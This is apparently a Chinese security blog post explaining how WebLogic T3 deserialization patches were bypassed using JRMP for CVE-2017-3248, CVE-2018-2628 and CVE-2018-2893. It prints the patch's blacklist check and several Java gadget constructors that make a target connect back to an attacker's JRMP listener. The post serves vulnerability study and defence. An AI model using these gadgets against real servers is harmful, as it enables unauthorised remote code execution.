WebLogic基于T3协议的反序列化之利用JRMP进行绕过

0x6b79

已于 2023-08-31 21:05:23 修改

阅读量264

点赞数

分类专栏： java安全文章标签： web安全安全 java

于 2023-03-05 18:05:48 首次发布

本文链接：https://blog.csdn.net/qq_53264525/article/details/129348969

版权

java安全专栏收录该内容

47 篇文章 3 订阅

订阅专栏

0x01

前面的CVE-2016-3510/CVE-2016-0638都是把payload封装在对象里面进行绕过，而后续的绕过就利用JRMP进行绕过。

0x02 CVE-2017-3248

直接使用T3协议打payloads/JRMPClient Gadget，使目标连接我们架设好的exploit/JRMPListern后反序列化 JRMPListern返回的恶意对象。

0x03 CVE-2018-2628

在InboundMsgAbbrev$ServerChannelInputStream类上添加一个resolveProxyClass方法，不让反序列化Registry接口的代理类。

protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
   String[] arr$ = interfaces;
   int len$ = interfaces.length;
   for(int i$ = 0; i$ < len$; ++i$) {
      String intf = arr$[i$];
      if(intf.equals("java.rmi.registry.Registry")) {
         throw new InvalidObjectException("Unauthorized proxy deserialization");
      }
   }
   return super.resolveProxyClass(interfaces);
}

payloads/JRMPClient不用代理类，直接使用RemoteObjectInvocationHandler类

public static Object getObject() throws Exception{
    TCPEndpoint tcpEndpoint = new TCPEndpoint(host,port,null,null);
    LiveRef liveRef = new LiveRef(new ObjID(0),tcpEndpoint,false);
    UnicastRef unicastRef = new UnicastRef(liveRef);
    RemoteObjectInvocationHandler remoteObjectInvocationHandler = new RemoteObjectInvocationHandler(unicastRef);
    return remoteObjectInvocationHandler;
}

可以换为任意一个接口。

public static Object getObject() throws Exception{
    TCPEndpoint tcpEndpoint = new TCPEndpoint(host,port,null,null);
    LiveRef liveRef = new LiveRef(new ObjID(0),tcpEndpoint,false);
    UnicastRef unicastRef = new UnicastRef(liveRef);
    RemoteObjectInvocationHandler remoteObjectInvocationHandler = new RemoteObjectInvocationHandler(unicastRef);
    Map proxy = (Map) Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[] {
        Map.class
            }, remoteObjectInvocationHandler);
    return proxy;
}

0x04 CVE-2018-2893

把RemoteObjectInvocationHandler/UnicastRef都加入了黑名单，把RemoteObjectInvocationHandler替换为另一个继承RemoteObject的类即可

public static Object getObject() throws Exception{
    TCPEndpoint tcpEndpoint = new TCPEndpoint(host,port,null,null);
    LiveRef liveRef = new LiveRef(new ObjID(0),tcpEndpoint,false);
    UnicastRef unicastRef = new UnicastRef(liveRef);
    RMIConnectionImpl_Stub rmiConnectionImpl_stub = new RMIConnectionImpl_Stub(unicastRef);
    return rmiConnectionImpl_stub;
}